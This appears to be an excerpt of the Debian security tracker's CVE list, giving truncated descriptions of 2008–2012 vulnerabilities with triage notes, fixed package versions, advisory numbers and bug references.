CVE-2012-4611 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA ...)
	NOT-FOR-US: EMC
CVE-2012-4610 (EMC Avamar Client for VMware 6.1 stores the cleartext server root ...)
	NOT-FOR-US: VMware
CVE-2012-4609 (The web interface in EMC RSA NetWitness Informer before 2.0.5.6 allows ...)
	NOT-FOR-US: EMC RSA NetWitness Informer
CVE-2012-4608 (Cross-site request forgery (CSRF) vulnerability in the web interface ...)
	NOT-FOR-US: EMC RSA NetWitness Informer
CVE-2012-4607 (Buffer overflow in nsrindexd in EMC NetWorker 7.5.x and 7.6.x before ...)
	NOT-FOR-US: EMC NetWorker
CVE-2011-5127 (Directory traversal vulnerability in Blue Coat Reporter 9.x before ...)
	NOT-FOR-US: Blue Coat
CVE-2011-5126 (Blue Coat ProxySG 6.1 before SGOS 6.1.5.1 and 6.2 before SGOS 6.2.2.1 ...)
	NOT-FOR-US: Blue Coat
CVE-2011-5125 (Cross-site scripting (XSS) vulnerability in Blue Coat Director before ...)
	NOT-FOR-US: Blue Coat
CVE-2011-5124 (Stack-based buffer overflow in the BCAAA component before build 60258, ...)
	NOT-FOR-US: Blue Coat
CVE-2011-5123 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2011-5122 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2011-5121 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2011-5120 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2011-5119 (Multiple race conditions in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2011-5118 (Multiple race conditions in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2010-5192 (Cross-site scripting (XSS) vulnerability in the Java Management ...)
	NOT-FOR-US: Blue Coat
CVE-2010-5191 (Multiple cross-site request forgery (CSRF) vulnerabilities on the Blue ...)
	NOT-FOR-US: Blue Coat
CVE-2010-5190 (The Active Content Transformation functionality in Blue Coat ProxySG ...)
	NOT-FOR-US: Blue Coat
CVE-2010-5189 (Blue Coat ProxySG before SGOS 4.3.4.1, 5.x before SGOS 5.4.5.1, 5.5 ...)
	NOT-FOR-US: Blue Coat
CVE-2010-5188 (SilverStripe 2.3.x before 2.3.6 allows remote attackers to obtain ...)
	- silverstripe (bug #528461)
CVE-2010-5187 (SilverStripe 2.3.x before 2.3.8 and 2.4.x before 2.4.1, when running ...)
	- silverstripe (bug #528461)
CVE-2010-5186 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2010-5185 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2010-5184 (** DISPUTED ** Race condition in ZoneAlarm Extreme Security ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5183 (** DISPUTED ** Race condition in Webroot Internet Security Essentials ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5182 (** DISPUTED ** Race condition in VirusBuster Internet Security Suite ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5181 (** DISPUTED ** Race condition in VIPRE Antivirus Premium 4.0.3272 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5180 (** DISPUTED ** Race condition in VBA32 Personal 3.12.12.4 on Windows ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5179 (** DISPUTED ** Race condition in Trend Micro Internet Security Pro ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5178 (** DISPUTED ** Race condition in ThreatFire 4.7.0.17 on Windows XP ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5177 (** DISPUTED ** Race condition in Sophos Endpoint Security and Control ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5176 (** DISPUTED ** Race condition in Security Shield 2010 13.0.16.313 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5175 (** DISPUTED ** Race condition in PrivateFirewall 7.0.20.37 on Windows ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5174 (** DISPUTED ** Race condition in Prevx 3.0.5.143 on Windows XP allows ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5173 (** DISPUTED ** Race condition in PC Tools Firewall Plus 6.0.0.88 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5172 (** DISPUTED ** Race condition in Panda Internet Security 2010 15.01.00 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5171 (** DISPUTED ** Race condition in Outpost Security Suite Pro ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5170 (** DISPUTED ** Race condition in Online Solutions Security Suite ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5169 (** DISPUTED ** Race condition in Online Armor Premium 4.0.0.35 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5168 (** DISPUTED ** Race condition in Symantec Norton Internet Security ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5167 (** DISPUTED ** Race condition in Norman Security Suite PRO 8.0 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5166 (** DISPUTED ** Race condition in McAfee Total Protection 2010 10.0.580 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5165 (** DISPUTED ** Race condition in Malware Defender 2.6.0 on Windows XP ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5164 (** DISPUTED ** Race condition in KingSoft Personal Firewall 9 Plus ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5163 (** DISPUTED ** Race condition in Kaspersky Internet Security 2010 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5162 (** DISPUTED ** Race condition in G DATA TotalCare 2010 on Windows XP ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5161 (** DISPUTED ** Race condition in F-Secure Internet Security 2010 10.00 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5160 (** DISPUTED ** Race condition in ESET Smart Security 4.2.35.3 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5159 (** DISPUTED ** Race condition in Dr.Web Security Space Pro 6.0.0.03100 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5158 (** DISPUTED ** Race condition in DefenseWall Personal Firewall 3.00 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5157 (Race condition in Comodo Internet Security before 4.1.149672.916 on ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2010-5156 (** DISPUTED ** Race condition in CA Internet Security Suite Plus 2010 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5155 (** DISPUTED ** Race condition in Blink Professional 4.6.1 on Windows ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5154 (** DISPUTED ** Race condition in BitDefender Total Security 2010 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5153 (** DISPUTED ** Race condition in Avira Premium Security Suite ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5152 (** DISPUTED ** Race condition in AVG Internet Security 9.0.791 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5151 (** DISPUTED ** Race condition in avast! Internet Security 5.0.462 on ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2010-5150 (** DISPUTED ** Race condition in 3D EQSecure Professional Edition 4.2 ...)
	NOT-FOR-US: Anti virus snake oil
CVE-2009-5132 (The Filtering Service in Websense Web Security and Web Filter before ...)
	NOT-FOR-US: Websense
CVE-2009-5131 (The Receive Service in Websense Email Security before 7.1 does not ...)
	NOT-FOR-US: Websense
CVE-2009-5130 (The Rules Service in Websense Email Security before 7.1 allows remote ...)
	NOT-FOR-US: Websense
CVE-2009-5129 (The Websense V10000 appliance before 1.0.1 allows remote attackers to ...)
	NOT-FOR-US: Websense
CVE-2009-5128 (The Websense V10000 appliance before 1.0.1 allows remote attackers to ...)
	NOT-FOR-US: Websense
CVE-2009-5127 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2009-5126 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2009-5125 (Comodo Internet Security before 3.9.95478.509 allows remote attackers ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2009-5124 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2009-5123 (The Antivirus component in Comodo Internet Security before ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2012-4667 (Multiple cross-site scripting (XSS) vulnerabilities in SquidClamav 5.x ...)
	- squidclamav (bug #685398)
CVE-2012-4606
	RESERVED
CVE-2011-5117 (Sophos SafeGuard Enterprise Device Encryption 5.x through 5.50.8.13, ...)
	NOT-FOR-US: Sophos SafeGuard
CVE-2011-5116 (SQL injection vulnerability in setseed-hub in SetSeed CMS 5.8.20, ...)
	NOT-FOR-US: SetSeed CMS
CVE-2011-5115 (Cross-site scripting (XSS) vulnerability in DLGuard, possibly 4.6 and ...)
	NOT-FOR-US: DLguard
CVE-2011-5114 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	NOT-FOR-US: DLguard
CVE-2011-5113 (SQL injection vulnerability in frontend/models/techfoliodetail.php in ...)
	NOT-FOR-US: Joomla addon
CVE-2011-5112 (SQL injection vulnerability in Alameda (com_alameda) component before ...)
	NOT-FOR-US: Joomla addon
CVE-2011-5111 (Multiple SQL injection vulnerabilities in Kajian Website CMS Balitbang ...)
	NOT-FOR-US: Kajian Website CMS
CVE-2011-5110 (Multiple SQL injection vulnerabilities in Blogs Manager 1.101 and ...)
	NOT-FOR-US: Blogs Manager
CVE-2011-5109 (Multiple SQL injection vulnerabilities in Freelancer calendar 1.01 and ...)
	NOT-FOR-US: Freelancer calendar
CVE-2011-5108 (Cross-site scripting (XSS) vulnerability in config.php in AdaptCMS ...)
	NOT-FOR-US: AdaptCMS
CVE-2011-5107 (Cross-site scripting (XSS) vulnerability in post_alert.php in Alert ...)
	NOT-FOR-US: Wordpress plugin
CVE-2011-5106 (Cross-site scripting (XSS) vulnerability in edit-post.php in the ...)
	NOT-FOR-US: Wordpress plugin
CVE-2011-5105 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: ZOHO ManageEngine ADSelfService Plus
CVE-2011-5104 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Wordpress plugin
CVE-2011-5103 (SQL injection vulnerability in Alurian Prismotube PHP Video Script ...)
	NOT-FOR-US: Alurian Prismotube PHP Video Script
CVE-2012-4605 (The default configuration of the SMTP component in Websense Email ...)
	NOT-FOR-US: Websense Email Security
CVE-2012-4604 (The TRITON management console in Websense Web Security before 7.6 ...)
	NOT-FOR-US: Websense Web Security
CVE-2012-4603
	RESERVED
CVE-2012-4602 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Nicola Asuni TCExam
CVE-2012-4601 (Multiple SQL injection vulnerabilities in Nicola Asuni TCExam before ...)
	NOT-FOR-US: Nicola Asuni TCExam
CVE-2012-4600 (Cross-site scripting (XSS) vulnerability in Open Ticket Request System ...)
	- otrs2 3.1.7+dfsg1-5
CVE-2011-5102 (The Investigative Reports web interface in the TRITON management ...)
	NOT-FOR-US: Websense
CVE-2010-5149 (Websense Web Security and Web Filter before 6.3.3 Hotfix 27 and 7.x ...)
	NOT-FOR-US: Websense
CVE-2010-5148 (Websense Web Security and Web Filter before 7.1 Hotfix 21 do not set ...)
	NOT-FOR-US: Websense
CVE-2010-5147 (The Remote Filtering component in Websense Web Security and Web Filter ...)
	NOT-FOR-US: Websense
CVE-2010-5146 (The Remote Filtering component in Websense Web Security and Web Filter ...)
	NOT-FOR-US: Websense
CVE-2010-5145 (The Filtering Service in Websense Web Security and Web Filter before ...)
	NOT-FOR-US: Websense
CVE-2010-5144 (The ISAPI Filter plug-in in Websense Enterprise, Websense Web ...)
	NOT-FOR-US: Websense
CVE-2009-5122 (The Personal Email Manager component in Websense Email Security before ...)
	NOT-FOR-US: Websense
CVE-2009-5121 (Websense Email Security 7.1 before Hotfix 4 allows remote attackers to ...)
	NOT-FOR-US: Websense
CVE-2009-5120 (The default configuration of Apache Tomcat in Websense Manager in ...)
	NOT-FOR-US: Websense
CVE-2009-5119 (The default configuration of Apache Tomcat in Websense Manager in ...)
	NOT-FOR-US: Websense
CVE-2008-7312 (The Filtering Service in Websense Enterprise 5.2 through 6.3 does not ...)
	NOT-FOR-US: Websense
CVE-2012-4599 (McAfee SmartFilter Administration, and SmartFilter Administration Bess ...)
	NOT-FOR-US: McAfee SmartFilter Administration
CVE-2012-4598 (An unspecified ActiveX control in McAfee Virtual Technician (MVT) ...)
	NOT-FOR-US: McAfee Virtual Technician
CVE-2012-4597 (Cross-site scripting (XSS) vulnerability in McAfee Email and Web ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4596 (Directory traversal vulnerability in McAfee Email Gateway (MEG) 7.0.0 ...)
	NOT-FOR-US: McAfee Email Gateway
CVE-2012-4595 (McAfee Email and Web Security (EWS) 5.5 through Patch 6 and 5.6 ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4594 (McAfee ePolicy Orchestrator (ePO) 4.6.1 and earlier allows remote ...)
	NOT-FOR-US: McAfee ePolicy Orchestrator
CVE-2012-4593 (McAfee Application Control and Change Control 5.1.x and 6.0.0 do not ...)
	NOT-FOR-US: McAfee Application Control and Change Control
CVE-2012-4592 (The Portal in McAfee Enterprise Mobility Manager (EMM) before 10.0 ...)
	NOT-FOR-US: McAfee Enterprise Mobility Manager
CVE-2012-4591 (About.aspx in the Portal in McAfee Enterprise Mobility Manager (EMM) ...)
	NOT-FOR-US: McAfee Enterprise Mobility Manager
CVE-2012-4590 (Multiple cross-site scripting (XSS) vulnerabilities in About.aspx in ...)
	NOT-FOR-US: McAfee Enterprise Mobility Manager
CVE-2012-4589 (Login.aspx in the Portal in McAfee Enterprise Mobility Manager (EMM) ...)
	NOT-FOR-US: McAfee Enterprise Mobility Manager
CVE-2012-4588 (McAfee Enterprise Mobility Manager (EMM) Agent before 4.8 and Server ...)
	NOT-FOR-US: McAfee Enterprise Mobility Manager
CVE-2012-4587 (McAfee Enterprise Mobility Manager (EMM) Agent before 4.8 and Server ...)
	NOT-FOR-US: McAfee Enterprise Mobility Manager
CVE-2012-4586 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4585 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4584 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4583 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4582 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4581 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4580 (Cross-site scripting (XSS) vulnerability in McAfee Email and Web ...)
	NOT-FOR-US: McAfee Email and Web Security
CVE-2012-4579 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin ...)
	- phpmyadmin 4:3.4.11.1-1
	[squeeze] - phpmyadmin (Vulnerable code not present)
CVE-2012-4578 (The geli encryption provider 7 before r239184 on FreeBSD 10 uses a ...)
	- freebsd-utils (only affects dev version of 10)
	NOTE: not sure if the bug is in the userland tool or in the kernel device
CVE-2012-4577 (The Linux firmware image on (1) Korenix Jetport 5600 series ...)
	NOT-FOR-US: Korenix Jetport 5600
CVE-2012-4576 [freebsd privilege escalation]
	RESERVED
	- kfreebsd-8 8.3-6 (bug #694096)
	- kfreebsd-9 9.0-9 (bug #694097)
	- kfreebsd-10 (bug #694098)
	[squeeze] - kfreebsd-8 8.1+dfsg-8+squeeze4
CVE-2012-4575 (The add_database function in objects.c in the pgbouncer pooler 1.5.2 ...)
	- pgbouncer 1.5.2-4
CVE-2012-4574 (Pulp in Red Hat CloudForms before 1.1 uses world-readable permissions ...)
	NOT-FOR-US: Red Hat CloudForms
CVE-2012-4573 (The v1 API in OpenStack Glance Grizzly, Folsom (2012.2), and Essex ...)
	- glance 2012.1.1-2 (bug #692641)
CVE-2012-4572
	RESERVED
CVE-2012-4571 (Python Keyring 0.9.1 does not securely initialize the cipher when ...)
	- python-keyring 0.9.2-1 (bug #675379)
	[wheezy] - python-keyring 0.7.1-1+deb7u1
CVE-2012-4570 [sql injection]
	RESERVED
	- php-letodms-core 3.3.8-1
CVE-2012-4569 [multiple xss in 3.3.9]
	RESERVED
	- letodms 3.3.9+dfsg-1
CVE-2012-4568 [csrf]
	RESERVED
	- letodms 3.3.9+dfsg-1
CVE-2012-4567 [multiple xss in 3.3.8]
	RESERVED
	- letodms 3.3.9+dfsg-1
CVE-2012-4566 (The DTLS support in radsecproxy before 1.6.2 does not properly verify ...)
	{DSA-2573-1}
	- radsecproxy 1.6.2-1
CVE-2012-4565 (The tcp_illinois_info function in net/ipv4/tcp_illinois.c in the Linux ...)
	- linux 3.2.35-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2012-4564 (ppm2tiff does not check the return value of the TIFFScanlineSize ...)
	{DSA-2575-1}
	- tiff3 (The tiff-tools package is only built from the tiff source package)
	- tiff 4.0.2-5 (bug #692345)
CVE-2012-4563 (Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) ...)
	- gwt (bug #691900)
	[squeeze] - gwt (Vulnerable code not present)
CVE-2012-4562 (Multiple integer overflows in libssh before 0.5.3 allow remote ...)
	{DSA-2577-1}
	- libssh 0.5.3-1
CVE-2012-4561 (The (1) publickey_make_dss, (2) publickey_make_rsa, (3) ...)
	{DSA-2577-1}
	- libssh 0.5.3-1
CVE-2012-4560 (Multiple buffer overflows in libssh before 0.5.3 allow remote ...)
	- libssh 0.5.3-1
	[squeeze] - libssh (Vulnerable code not present)
CVE-2012-4559 (Multiple double free vulnerabilities in the (1) agent_sign_data ...)
	{DSA-2577-1}
	- libssh 0.5.3-1
CVE-2012-4558 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	{DSA-2637-1}
	- apache2 2.2.22-13 (low)
CVE-2012-4557 (The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through ...)
	{DSA-2579-1}
	- apache2 2.2.22-1
CVE-2012-4556 (The token processing system (pki-tps) in Red Hat Certificate System ...)
	NOT-FOR-US: Red Hat Certificate System
CVE-2012-4555 (The token processing system (pki-tps) in Red Hat Certificate System ...)
	NOT-FOR-US: Red Hat Certificate System
CVE-2012-4554 (The OpenID module in Drupal 7.x before 7.16 allows remote OpenID ...)
	- drupal7 7.14-1.1 (bug #690817)
	- drupal6 (according to upstream)
	NOTE: http://drupal.org/node/1815912
CVE-2012-4553 (Drupal 7.x before 7.16 allows remote attackers to obtain sensitive ...)
	- drupal7 7.14-1.1 (bug #690817)
	- drupal6 (according to upstream)
	NOTE: http://drupal.org/node/1815912
CVE-2012-4552 (Stack-based buffer overflow in the error function in ssg/ssgParser.cxx ...)
	- plib 1.8.5-6 (low; bug #694810)
	[squeeze] - plib (Minor issue)
CVE-2012-4551 (Use-after-free vulnerability in libunity-webapps before 2.4.1 allows ...)
	NOT-FOR-US: libunity-webapps
CVE-2012-4550 (JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) before ...)
	- jbossas4 (Only builds a few libraries, not the full application server)
CVE-2012-4549 (The processInvocation function in ...)
	- jbossas4 (Only builds a few libraries, not the full application server)
CVE-2012-4548 (Argument injection vulnerability in syntax-highlighting.sh in cgit ...)
	- cgit (bug #515793)
CVE-2012-4547 (Unspecified vulnerability in awredir.pl in AWStats before 7.1 has ...)
	- awstats
	NOTE: awredir.pl is not installed into the binary package
CVE-2012-4546 (The default configuration for IPA servers in Red Hat Enterprise Linux ...)
	NOT-FOR-US: FreeIPA
CVE-2012-4545 (The http_negotiate_create_context function in ...)
	{DSA-2592-1}
	- elinks 0.12~pre5-9
CVE-2012-4544 (The PV domain builder in Xen 4.2 and earlier does not validate the ...)
	{DSA-2636-1}
	- xen 4.1.3-4 (low; bug #688125)
CVE-2012-4543 (Multiple cross-site scripting (XSS) vulnerabilities in Red Hat ...)
	NOT-FOR-US: Red Hat Certificate System
CVE-2012-4542 (block/scsi_ioctl.c in the Linux kernel through 3.8 does not properly ...)
	- linux
	- linux-2.6
CVE-2012-4541 (Cross-site scripting (XSS) vulnerability in Piwik before 1.9 allows ...)
	- piwik (bug #506933)
CVE-2012-4540 (Off-by-one error in the invoke function in ...)
	- icedtea-web 1.3.1-1 (bug #692608)
	NOTE: http://seclists.org/oss-sec/2012/q4/237
CVE-2012-4539 (Xen 4.0 through 4.2, when running 32-bit x86 PV guests on 64-bit ...)
	{DSA-2582-1}
	- xen 4.1.3-4
CVE-2012-4538 (The HVMOP_pagetable_dying hypercall in Xen 4.0, 4.1, and 4.2 does not ...)
	{DSA-2582-1}
	- xen 4.1.3-4
CVE-2012-4537 (Xen 3.4 through 4.2, and possibly earlier versions, does not properly ...)
	{DSA-2582-1}
	- xen 4.1.3-4
CVE-2012-4536 (The (1) domain_pirq_to_emuirq and (2) physdev_unmap_pirq functions in ...)
	- xen 4.1.3-4
	[squeeze] - xen (Only affects 4.1.x)
CVE-2012-4535 (Xen 3.4 through 4.2, and possibly earlier versions, allows local guest ...)
	{DSA-2582-1}
	- xen 4.1.3-4
CVE-2012-4534 (org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x ...)
	- tomcat7 7.0.28-1 (bug #695251)
	- tomcat6 6.0.35-6 (bug #695250)
CVE-2012-4533 (Cross-site scripting (XSS) vulnerability in the "extra" details in the ...)
	{DSA-2563-1}
	- viewvc 1.1.5-1.4 (low; bug #691062)
CVE-2012-4532 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Joomla addon
CVE-2012-4531 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.7 ...)
	- joomla (bug #571794)
CVE-2012-4530 (The load_script function in fs/binfmt_script.c in the Linux kernel ...)
	- linux 3.2.35-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2012-4529
	RESERVED
	- jbossas4 (Only builds a few libraries, not the full application server)
CVE-2012-4528 (The mod_security2 module before 2.7.0 for the Apache HTTP Server ...)
	- modsecurity-apache 2.6.6-5 (bug #691146)
	- libapache-mod-security
CVE-2012-4527 (Stack-based buffer overflow in mcrypt 2.6.8 and earlier allows ...)
	- mcrypt 2.6.8-1.3 (unimportant; bug #690924)
	NOTE: patch proposed by submitter at RH bugzilla is incorrect
	NOTE: Only occurs in cmdline parsing, no priv escalation. Only a security issue in constructed setups
CVE-2012-4526 [XSS in password.php, incomplete fix for CVE-2012-4525]
	RESERVED
	- piwigo (incomplete fix not applied to Debian package)
	[squeeze] - piwigo (vulnerable code not present)
CVE-2012-4525 [XSS in password.php]
	RESERVED
	- piwigo
	[squeeze] - piwigo (vulnerable code not present)
CVE-2012-4524 [xlockmore bypass]
	RESERVED
	- xlockmore (low)
CVE-2012-4523 (radsecproxy before 1.6.1 does not properly verify certificates when ...)
	{DSA-2573-1}
	- radsecproxy 1.6.2-1
CVE-2012-4522 (The rb_get_path_check function in file.c in Ruby 1.9.3 before ...)
	- ruby1.8 (Only affects 1.9.x, see bug #690670)
	- ruby1.9.1 1.9.3.194-3 (bug #690670)
CVE-2012-4521 [rejected dupe assignment]
	REJECTED
CVE-2012-4520 (The django.http.HttpRequest.get_host function in Django 1.3.x before ...)
	{DSA-2634-1}
	- python-django 1.4.2-1 (bug #691145)
CVE-2012-4519
	RESERVED
	NOT-FOR-US: Zenphoto
CVE-2012-4518 (ibacm 1.0.7 creates files with world-writable permissions, which ...)
	NOT-FOR-US: ibacm
CVE-2012-4517 (ibacm before 1.0.6 does not properly manage reference counts for ...)
	NOT-FOR-US: ibacm
CVE-2012-4516 (librdmacm 1.0.16, when ibacm.port is not specified, connects to port ...)
	- librdmacm 1.0.16-1 (bug #690672)
	[squeeze] - librdmacm (Introduced in 1.0.12)
	[wheezy] - librdmacm 1.0.15-1+deb7u1
CVE-2012-4515 (Use-after-free vulnerability in khtml/rendering/render_replaced.cpp in ...)
	- kdebase (unimportant)
	- kde-baseapps (unimportant)
	NOTE: Konqueror not supported security-wise
CVE-2012-4514 (rendering/render_replaced.cpp in Konqueror in KDE before 4.9.3 allows ...)
	- kdebase (unimportant)
	- kde-baseapps (unimportant)
	NOTE: Konqueror not supported security-wise
CVE-2012-4513 (khtml/imload/scaledimageplane.h in Konqueror in KDE 4.7.3 allows ...)
	- kdebase (unimportant)
	- kde-baseapps (unimportant)
	NOTE: Konqueror not supported security-wise
CVE-2012-4512
	RESERVED
	- kdebase (unimportant)
	- kde-baseapps (unimportant)
	NOTE: Konqueror not supported security-wise
CVE-2012-4511 (services/flickr/flickr.c in libsocialweb before 0.25.21 automatically ...)
	- libsocialweb 0.25.20-3.1 (low; bug #690675)
	[wheezy] - libsocialweb 0.25.20-2.1
CVE-2012-4510 (cups-pk-helper before 0.2.3 does not properly wrap the (1) cupsGetFile ...)
	{DSA-2562-1}
	- cups-pk-helper 0.2.3-1
CVE-2012-4509
	RESERVED
CVE-2012-4508 (Race condition in fs/ext4/extents.c in the Linux kernel before 3.4.16 ...)
	{DSA-2668-1}
	- linux 3.2.35-1
	- linux-2.6
CVE-2012-4507 (The strchr function in procmime.c in Claws Mail (aka claws-mail) 3.8.1 ...)
	- claws-mail 3.8.1-2 (low; bug #690151)
	[squeeze] - claws-mail (Minor issue)
	[squeeze] - claws-mail 3.7.6-4+squeeze1
	NOTE: http://www.thewildbeast.co.uk/claws-mail/bugzilla/show_bug.cgi?id=2743
	NOTE: www.thewildbeast.co.uk/claws-mail/bugzilla/attachment.cgi?id=1165
CVE-2012-4506 (Directory traversal vulnerability in gitolite 3.x before 3.1, when ...)
	- gitolite (Only affects 3.x releases)
	NOTE: https://groups.google.com/forum/#!topic/gitolite/K9SnQNhCQ-0/discussion
	NOTE: https://github.com/sitaramc/gitolite/commit/f636ce3ba3e340569b26d1e47b9d9b62dd8a3bf2
CVE-2012-4505 (Heap-based buffer overflow in the px_pac_reload function in lib/pac.c ...)
	{DSA-2571-1}
	- libproxy 0.3.1-5.1 (bug #690376)
CVE-2012-4504 (Stack-based buffer overflow in the url::get_pac function in url.cpp in ...)
	- libproxy (Vulnerable code not present)
	NOTE: 0.4-only issue, fixed in newest upstream 0.4.9
CVE-2012-4503
	RESERVED
CVE-2012-4502
	RESERVED
CVE-2012-4501 (Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows ...)
	NOT-FOR-US: CloudStack
CVE-2012-4500 (The Announcements module 6.x-1.x before 6.x-1.5 for Drupal allows ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4499 (The contact formatter page in the Email Field module 6.x-1.x before ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4498 (The Activism module 6.x-2.x before 6.x-2.1 for Drupal does not ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4497 (Cross-site scripting (XSS) vulnerability in the "3 slide gallery" in ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4496 (Cross-site scripting (XSS) vulnerability in the Custom Publishing ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4495 (The Mime Mail module 6.x-1.x before 6.x-1.1 for Drupal does not ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4494 (The Shibboleth authentication module 7.x-4.0 for Drupal does not ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4493 (Cross-site scripting (XSS) vulnerability in the administrative ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4492 (Multiple cross-site scripting (XSS) vulnerabilities in the Shorten ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4491 (The Monthly Archive by Node Type module 6.x for Drupal does not ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4490 (Multiple cross-site scripting (XSS) vulnerabilities in the Excluded ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4489 (Open redirect vulnerability in the securelogin_secure_redirect ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4488 (The Location module 6.x before 6.x-3.2 and 7.x before 7.x-3.0-alpha1 ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4487 (The Subuser module before 6.x-1.8 for Drupal does not properly check ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4486 (Cross-site request forgery (CSRF) vulnerability in the Subuser module ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4485 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4484 (Cross-site scripting (XSS) vulnerability in the administrative ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4483 (The commons_discussion_views_default_views function in ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4482 (The Ubercart SecureTrading Payment Method module 6.x for Drupal does ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-4481 (The safe-level feature in Ruby 1.8.7 allows context-dependent ...)
	- ruby1.8 1.8.7.358-5 (bug #689945)
